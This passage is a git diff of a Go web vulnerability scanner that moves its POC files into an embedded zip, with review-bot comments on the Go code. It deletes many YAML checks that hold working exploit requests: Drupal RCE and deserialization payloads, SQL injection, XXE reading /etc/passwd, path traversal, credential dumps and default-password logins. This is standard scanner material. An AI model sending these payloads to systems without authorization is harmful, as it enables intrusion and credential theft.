diff --git a/WebScan/lib/http.pb.go b/WebScan/lib/http.pb.go
index 1c36c53..51ba410 100644
--- a/WebScan/lib/http.pb.go
+++ b/WebScan/lib/http.pb.go
@@ -4,10 +4,14 @@ package lib
 import (
+ "bytes"
+ "archive/zip"
 "embed"
 fmt "fmt"
 proto "github.com/golang/protobuf/proto"
 "gopkg.in/yaml.v3"
+ "io/ioutil"
+ "log"
 math "math"
 "strings"
 )
@@ -393,7 +397,28 @@ func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
 func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
 p := &Poc{}
- yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
+
+ zByte, err := Pocs.ReadFile("pocs/pocs.zip")
+ zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte)))
+ if err != nil {
+ log.Fatal(err)
+ }
+ var unzippedFileBytes []byte
+ // Read all the files from zip archive
+ for _, zipFile := range zipReader.File {
+ if zipFile.Name == fileName {
+ unzippedFileBytes, err = readZipFile(zipFile)
+ if err != nil {
+ log.Println(err)
+ continue
+ }
+ break
+ }
+
+ }
+ yamlFile := unzippedFileBytes
+
+ //yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
 if err != nil {
 return nil, err
@@ -406,6 +431,23 @@ func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
 }
 func SelectPoc(Pocs embed.FS, pocname string) []string {
+
+
+ zByte, err := Pocs.ReadFile("pocs/pocs.zip")
+ zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte)))
+ if err != nil {
+ log.Fatal(err)
+ }
+ var foundFiles []string
+ // Read all the files from zip archive
+ for _, entry := range zipReader.File {
+ if strings.Contains(entry.Name, pocname){
+ foundFiles = append(foundFiles, entry.Name)
+ }
+
+ }
+
+ /*
 entries, err := Pocs.ReadDir("pocs")
 if err != nil {
 fmt.Println(err)
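Review bot: In loadPoc the error from `Pocs.ReadFile("pocs/pocs.zip")` is overwritten by the `zipReader, err := zip.NewReader(...)` line before it is ever checked, and the check that follows calls `log.Fatal`, which terminates the whole process from a function that already returns an error; the SelectPoc hunk below repeats both points. When no archive entry is named fileName the loop leaves `unzippedFileBytes` nil with `err` nil, so the function continues into the unmarshal with an empty document instead of reporting a missing POC; the body past the hunk (the yaml decode of yamlFile) is outside my view and assumed unchanged. The rewrite below returns each error to the caller and makes the not-found case explicit. The archive is also re-parsed on every call; if LoadMultiPoc invokes loadPoc once per name, parsing it a single time (for example behind a sync.Once) would avoid repeated decompression, though that caller is not in the hunk.
```go
zByte, err := Pocs.ReadFile("pocs/pocs.zip")
if err != nil {
	return nil, err
}
zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte)))
if err != nil {
	return nil, err
}
// Locate the requested entry; the archive is embedded, so its contents are trusted.
var yamlFile []byte
found := false
for _, zipFile := range zipReader.File {
	if zipFile.Name != fileName {
		continue
	}
	yamlFile, err = readZipFile(zipFile)
	if err != nil {
		return nil, err
	}
	found = true
	break
}
if !found {
	return nil, fmt.Errorf("poc %q not found in pocs.zip", fileName)
}
// … unchanged: yaml decode of yamlFile into p …
```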
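Review bot: `strings.Contains(entry.Name, pocname)` in SelectPoc accepts every archive entry whose full path contains the substring, including directory entries if the zip carries any, and those names are then passed to loadPoc, which compares `zipFile.Name` exactly, so a directory entry would surface later as a missing POC. Skipping non-files with `if entry.FileInfo().IsDir() { continue }` at the top of the loop keeps the result limited to loadable entries. The old `Pocs.ReadDir` implementation is retained inside a `/* ... */` block rather than deleted; version control already preserves it, and if `fmt` is referenced from nowhere else in the file the import may now be unused, which is worth a build check. The unchecked ReadFile error and the `log.Fatal` here are the same defect raised on the loadPoc hunk.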
@@ -416,5 +458,18 @@ func SelectPoc(Pocs embed.FS, pocname string) []string {
 foundFiles = append(foundFiles, entry.Name())
 }
 }
+
+ */
 return foundFiles
 }
+
+
+
+func readZipFile(zf *zip.File) ([]byte, error) {
+ f, err := zf.Open()
+ if err != nil {
+ return nil, err
+ }
+ defer f.Close()
+ return ioutil.ReadAll(f)
+}
\ No newline at end of file
diff --git a/WebScan/pocs/activemq-cve-2016-3088.yml b/WebScan/pocs/activemq-cve-2016-3088.yml
deleted file mode 100644
index 7b93f13..0000000
--- a/WebScan/pocs/activemq-cve-2016-3088.yml
+++ /dev/null
@@ -1,34 +0,0 @@
-name: poc-yaml-activemq-cve-2016-3088
-set:
- filename: randomLowercase(6)
- fileContent: randomLowercase(6)
-rules:
- - method: PUT
- path: /fileserver/{(unknown)}.txt
- body: |
- {{fileContent}}
- expression: |
- response.status == 204
- - method: GET
- path: /admin/test/index.jsp
- search: |
- activemq.home=(?P.*?),
- follow_redirects: false
- expression: |
- response.status == 200
- - method: MOVE
- path: /fileserver/{(unknown)}.txt
- headers:
- Destination: "file://{{home}}/webapps/api/{(unknown)}.jsp"
- follow_redirects: false
- expression: |
- response.status == 204
- - method: GET
- path: /api/{(unknown)}.jsp
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(bytes(fileContent))
-detail:
- author: j4ckzh0u(https://github.com/j4ckzh0u)
- links:
- - https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088
diff --git a/WebScan/pocs/activemq-default-password.yml b/WebScan/pocs/activemq-default-password.yml
deleted file mode 100644
index d9a7ef9..0000000
--- a/WebScan/pocs/activemq-default-password.yml
+++ /dev/null
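Review bot: readZipFile calls `ioutil.ReadAll`, which has been deprecated since Go 1.16; the file already imports `embed` (also Go 1.16+), so `return io.ReadAll(f)` works and the `"io/ioutil"` line added in the import hunk can become `"io"`. The helper has no doc comment; I would put `// readZipFile opens the archive entry zf and returns its fully decompressed contents.` above the signature. The `\ No newline at end of file` marker shows the file now ends without a trailing newline, which gofmt would restore. Since the archive is embedded at build time its contents are trusted, so the unbounded ReadAll is acceptable here; `zf.UncompressedSize64` is available should pre-sizing ever be wanted.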
@@ -1,16 +0,0 @@ -name: poc-yaml-activemq-default-password -rules: - - method: GET - path: /admin/ - expression: | - response.status == 401 && response.body.bcontains(b"Unauthorized") - - method: GET - path: /admin/ - headers: - Authorization: Basic YWRtaW46YWRtaW4= - expression: | - response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"

Broker

") -detail: - author: pa55w0rd(www.pa55w0rd.online/) - links: - - https://blog.csdn.net/ge00111/article/details/72765210 \ No newline at end of file diff --git a/WebScan/pocs/alibaba-canal-info-leak.yml b/WebScan/pocs/alibaba-canal-info-leak.yml deleted file mode 100644 index a51de57..0000000 --- a/WebScan/pocs/alibaba-canal-info-leak.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-alibaba-canal-info-leak -rules: - - method: GET - path: /api/v1/canal/config/1/1 - follow_redirects: false - expression: | - response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey") -detail: - author: Aquilao(https://github.com/Aquilao) - info: alibaba Canal info leak - links: - - https://my.oschina.net/u/4581879/blog/4753320 \ No newline at end of file diff --git a/WebScan/pocs/alibaba-nacos-api-unauth.yml b/WebScan/pocs/alibaba-nacos-api-unauth.yml deleted file mode 100644 index 52512fb..0000000 --- a/WebScan/pocs/alibaba-nacos-api-unauth.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-alibaba-nacos-api-unauth -rules: - - method: GET - path: /nacos/v1/auth/users?pageNo=1&pageSize=9 - headers: - User-Agent: Nacos-Server - follow_redirects: true - expression: | - response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password")) -detail: - author: AgeloVito - info: alibaba-nacos-api-unauth - login: nacos/nacos - links: - - https://blog.csdn.net/caiqiiqi/article/details/112005424 diff --git a/WebScan/pocs/alibaba-nacos.yml b/WebScan/pocs/alibaba-nacos.yml deleted file mode 100644 index 34a4407..0000000 --- a/WebScan/pocs/alibaba-nacos.yml +++ /dev/null 
@@ -1,13 +0,0 @@ -name: poc-yaml-alibaba-nacos -rules: - - method: GET - path: /nacos/ - follow_redirects: true - expression: | - response.body.bcontains(bytes("Nacos")) -detail: - author: AgeloVito - info: alibaba-nacos - login: nacos/nacos - links: - - https://blog.csdn.net/caiqiiqi/article/details/112005424 diff --git a/WebScan/pocs/apache-flink-upload-rce.yml b/WebScan/pocs/apache-flink-upload-rce.yml deleted file mode 100644 index 6be7ca6..0000000 --- a/WebScan/pocs/apache-flink-upload-rce.yml +++ /dev/null @@ -1,38 +0,0 @@ -name: poc-yaml-apache-flink-upload-rce -set: - r1: randomLowercase(8) - r2: randomLowercase(4) -rules: - - method: GET - path: /jars - follow_redirects: true - expression: > - response.status == 200 && response.content_type.contains("json") && - response.body.bcontains(b"address") && response.body.bcontains(b"files") - - method: POST - path: /jars/upload - headers: - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - body: |- - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="{{r2}}.jar" - Content-Type:application/octet-stream - - {{r1}} - --8ce4b16b22b58894aa86c421e8759df3-- - - follow_redirects: true - expression: > - response.status == 200 && response.content_type.contains("json") && - response.body.bcontains(b"success") && response.body.bcontains(bytes(r2)) - search: >- - (?P([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar)) - - method: DELETE - path: '/jars/{{filen}}' - follow_redirects: true - expression: | - response.status == 200 -detail: - author: timwhite - links: - - https://github.com/LandGrey/flink-unauth-rce diff --git a/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml b/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml deleted file mode 100644 index c6ca0a9..0000000 --- a/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml +++ /dev/null 
@@ -1,19 +0,0 @@ -name: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization -set: - rand: randomInt(200000000, 210000000) -rules: - - method: POST - path: /webtools/control/xmlrpc - headers: - Content-Type: application/xml - body: >- - {{rand}}dwisiswant0 - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand))) -detail: - author: su(https://suzzz112113.github.io/#blog) - links: - - https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3Cdev.ofbiz.apache.org%3E - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb diff --git a/WebScan/pocs/apache-solr-file-read.yml b/WebScan/pocs/apache-solr-file-read.yml deleted file mode 100644 index d1f6648..0000000 --- a/WebScan/pocs/apache-solr-file-read.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-apache-solr-file-read -rules: - - method: GET - path: "/solr/admin/cores?indexInfo=false&wt=json" - search: | - "name":"(?P.+?)", - expression: - response.status == 200 - - method: POST - path: "/solr/{{core_name}}/config" - headers: - Content-type: application/json - body: | - {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - expression: | - response.status == 200 && response.body.bcontains(b"This") -detail: - author: flyinbed - links: - - "https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg" - - "https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ" \ No newline at end of file diff --git a/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml b/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml deleted file mode 100644 index 51a6e22..0000000 --- a/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml +++ /dev/null 
@@ -1,15 +0,0 @@ -name: poc-yaml-apacheofbiz-cve-2018-8033-xxe -rules: - - method: POST - path: /webtools/control/xmlrpc - headers: - Content-Type: application/xml - body: >- - ]>&disclose; - follow_redirects: false - expression: > - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml") -detail: - author: su(https://suzzz112113.github.io/#blog) - links: - - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py \ No newline at end of file diff --git a/WebScan/pocs/bt742-pma-unauthorized-access.yml b/WebScan/pocs/bt742-pma-unauthorized-access.yml deleted file mode 100644 index 5292fe8..0000000 --- a/WebScan/pocs/bt742-pma-unauthorized-access.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-bt742-pma-unauthorized-access -rules: - - method: GET - path: /pma/ - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php") -detail: - author: Facker007(https://github.com/Facker007) - links: - - https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A diff --git a/WebScan/pocs/cisco-cve-2020-3452-readfile.yml b/WebScan/pocs/cisco-cve-2020-3452-readfile.yml deleted file mode 100644 index 0f4634b..0000000 --- a/WebScan/pocs/cisco-cve-2020-3452-readfile.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-cisco-cve-2020-3452-readfile -rules: - - method: GET - path: /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua - follow_redirects: false - expression: response.status == 200 && response.headers["Content-Type"] == "application/octet-stream" && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED") -detail: - author: JrD (https://github.com/JrDw0/) - links: - - https://nvd.nist.gov/vuln/detail/CVE-2020-3452 - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 diff --git a/WebScan/pocs/coremail-cnvd-2019-16798.yml b/WebScan/pocs/coremail-cnvd-2019-16798.yml deleted file mode 100644 index 097f5fa..0000000 --- a/WebScan/pocs/coremail-cnvd-2019-16798.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-coremail-cnvd-2019-16798 -rules: - - method: GET - path: >- - /mailsms/s?func=ADMIN:appState&dumpConfig=/ - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(bytes("")) -detail: - author: cc_ci(https://github.com/cc8ci) - links: - - https://www.secpulse.com/archives/107611.html \ No newline at end of file diff --git a/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml b/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml deleted file mode 100644 index 4445bce..0000000 --- a/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml +++ /dev/null 
@@ -1,22 +0,0 @@ -name: poc-yaml-discuz-ml3x-cnvd-2019-22239 -set: - r1: randomInt(800000000, 1000000000) -rules: - - method: GET - path: /forum.php - follow_redirects: false - expression: | - response.status == 200 - search: cookiepre = '(?P[\w_]+)' - - method: GET - path: /forum.php - headers: - Cookie: "{{token}}language=sc'.print(md5({{r1}})).'" - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(md5(string(r1)))) -detail: - author: X.Yang - Discuz_version: Discuz!ML 3.x - links: - - https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239 diff --git a/WebScan/pocs/dlink-cve-2019-17506.yml b/WebScan/pocs/dlink-cve-2019-17506.yml deleted file mode 100644 index 87cdc7d..0000000 --- a/WebScan/pocs/dlink-cve-2019-17506.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-dlink-cve-2019-17506 -rules: - - method: POST - path: /getcfg.php - headers: - Content-Type: application/x-www-form-urlencoded - body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") -detail: - author: l1nk3r,Huasir(https://github.com/dahua966/) - links: - - https://xz.aliyun.com/t/6453 diff --git a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml b/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml deleted file mode 100644 index 7fa21e7..0000000 --- a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-dlink-cve-2020-25078-account-disclosure -rules: - - method: GET - path: >- - /config/getuser?index=0 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain") -detail: - author: kzaopa(https://github.com/kzaopa) - links: - - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg \ No newline at end of file 
diff --git a/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml b/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml deleted file mode 100644 index fcbcf31..0000000 --- a/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-dlink-cve-2020-9376-dump-credentials -rules: - - method: POST - path: /getcfg.php - headers: - Content-Type: application/x-www-form-urlencoded - body: >- - SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1 - expression: > - response.status == 200 && response.body.bcontains(b"Admin") && response.body.bcontains(b"") && response.body.bcontains(b"") -detail: - author: x1n9Qi8 - Affected Version: "Dlink DIR-610" - links: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376 \ No newline at end of file diff --git a/WebScan/pocs/dlink-dcs-info-leak.yml b/WebScan/pocs/dlink-dcs-info-leak.yml deleted file mode 100644 index 746ff9f..0000000 --- a/WebScan/pocs/dlink-dcs-info-leak.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-dlink-dcs-info-leak -rules: - - method: GET - path: /config/getuser?index=0 - expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=") -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw \ No newline at end of file diff --git a/WebScan/pocs/docker-api-unauthorized-rce.yml b/WebScan/pocs/docker-api-unauthorized-rce.yml deleted file mode 100644 index 2ddd55a..0000000 --- a/WebScan/pocs/docker-api-unauthorized-rce.yml +++ /dev/null 
@@ -1,12 +0,0 @@ -name: poc-yaml-docker-api-unauthorized-rce -rules: - - method: GET - path: /info - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir") - -detail: - author: j4ckzh0u(https://github.com/j4ckzh0u) - links: - - https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce diff --git a/WebScan/pocs/docker-registry-api-unauth.yml b/WebScan/pocs/docker-registry-api-unauth.yml deleted file mode 100644 index 8b7f36d..0000000 --- a/WebScan/pocs/docker-registry-api-unauth.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-docker-registry-api-unauth -rules: - - method: GET - path: /v2/ - follow_redirects: false - expression: > - response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0") - - method: GET - path: /v2/_catalog - follow_redirects: false - expression: > - response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories") -detail: - author: p0wd3r - links: - - http://www.polaris-lab.com/index.php/archives/253/ diff --git a/WebScan/pocs/druid-monitor-unauth.yml b/WebScan/pocs/druid-monitor-unauth.yml deleted file mode 100644 index 15d2adb..0000000 --- a/WebScan/pocs/druid-monitor-unauth.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-druid-monitor-unauth -rules: - - method: GET - path: /druid/index.html - expression: | - response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") -detail: - author: met7or - links: - - https://github.com/alibaba/druid diff --git a/WebScan/pocs/drupal-cve-2014-3704-sqli.yml b/WebScan/pocs/drupal-cve-2014-3704-sqli.yml deleted file mode 100644 index 87d6939..0000000 
--- a/WebScan/pocs/drupal-cve-2014-3704-sqli.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-drupal-cve-2014-3704-sqli -rules: - - method: POST - path: /?q=node&destination=node - body: >- - pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or - updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a - follow_redirects: false - expression: | - response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") -detail: - Affected Version: "Drupal < 7.32" - links: - - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704 \ No newline at end of file diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce.yml b/WebScan/pocs/drupal-cve-2018-7600-rce.yml deleted file mode 100644 index 22cdad0..0000000 --- a/WebScan/pocs/drupal-cve-2018-7600-rce.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-drupal-cve-2018-7600-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ -test: - target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce2.yml b/WebScan/pocs/drupal-cve-2018-7600-rce2.yml deleted file mode 100644 index 9e723bb..0000000 --- a/WebScan/pocs/drupal-cve-2018-7600-rce2.yml +++ /dev/null 
@@ -1,29 +0,0 @@ -name: poc-yaml-drupal-cve-2018-7600-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password - search: | - name="form_build_id"\s+value="(?P.+?)" - expression: | - response.status == 200 - - method: POST - path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_build_id={{build_id}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ -test: - target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/drupal-cve-2019-6340.yml b/WebScan/pocs/drupal-cve-2019-6340.yml deleted file mode 100644 index 178a62b..0000000 --- a/WebScan/pocs/drupal-cve-2019-6340.yml +++ /dev/null 
@@ -1,33 +0,0 @@ -name: poc-yaml-drupal-cve-2019-6340 -set: - host: request.url.host - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: /node/?_format=hal_json - headers: - Content-Type: application/hal+json - Accept: '*/*' - body: | - { - "link": [ - { - "value": "link", - "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"{{r1}}%%{{r2}}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" - } - ], - "_links": { - "type": { - "href": "http://{{host}}/rest/type/shortcut/default" - } - } - } - follow_redirects: true - expression: | - response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - author: thatqier - links: - - https://github.com/jas502n/CVE-2019-6340 - - https://github.com/knqyf263/CVE-2019-6340 \ No newline at end of file diff --git a/WebScan/pocs/drupal-drupal7geddon2-rce.yml b/WebScan/pocs/drupal-drupal7geddon2-rce.yml deleted file mode 100644 index d9897e4..0000000 --- a/WebScan/pocs/drupal-drupal7geddon2-rce.yml +++ /dev/null 
@@ -1,28 +0,0 @@ -name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch] -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password - search: | - name="form_build_id"\s+value="(?P.+?)" - expression: | - response.status == 200 - - method: POST - path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_build_id={{build_id}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - drupal_version: 7 - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ diff --git a/WebScan/pocs/drupal-drupal8geddon2-rce.yml b/WebScan/pocs/drupal-drupal8geddon2-rce.yml deleted file mode 100644 index d8f6192..0000000 --- a/WebScan/pocs/drupal-drupal8geddon2-rce.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch] -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - drupal_version: 8 - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ -test: - target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/ecology-sqli.yml b/WebScan/pocs/ecology-sqli.yml deleted file mode 100644 index 3a732d1..0000000 --- a/WebScan/pocs/ecology-sqli.yml +++ /dev/null 
@@ -1,13 +0,0 @@ -name: poc-yaml-ecology-sqli -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20md5({{rand}})%20as%20id%20from%20HrmResourceManager - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://github.com/whami-root \ No newline at end of file diff --git a/WebScan/pocs/ecology-validate-sqli.yml b/WebScan/pocs/ecology-validate-sqli.yml deleted file mode 100644 index 52d4c88..0000000 --- a/WebScan/pocs/ecology-validate-sqli.yml +++ /dev/null 
@@ -1,17 +0,0 @@ -name: poc-yaml-ecology-validate-sqli -set: - r1: randomInt(8000, 9999) - r2: randomInt(800, 1000) -rules: - - method: POST - path: /cpt/manage/validate.jsp?sourcestring=validateNum - body: >- - sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%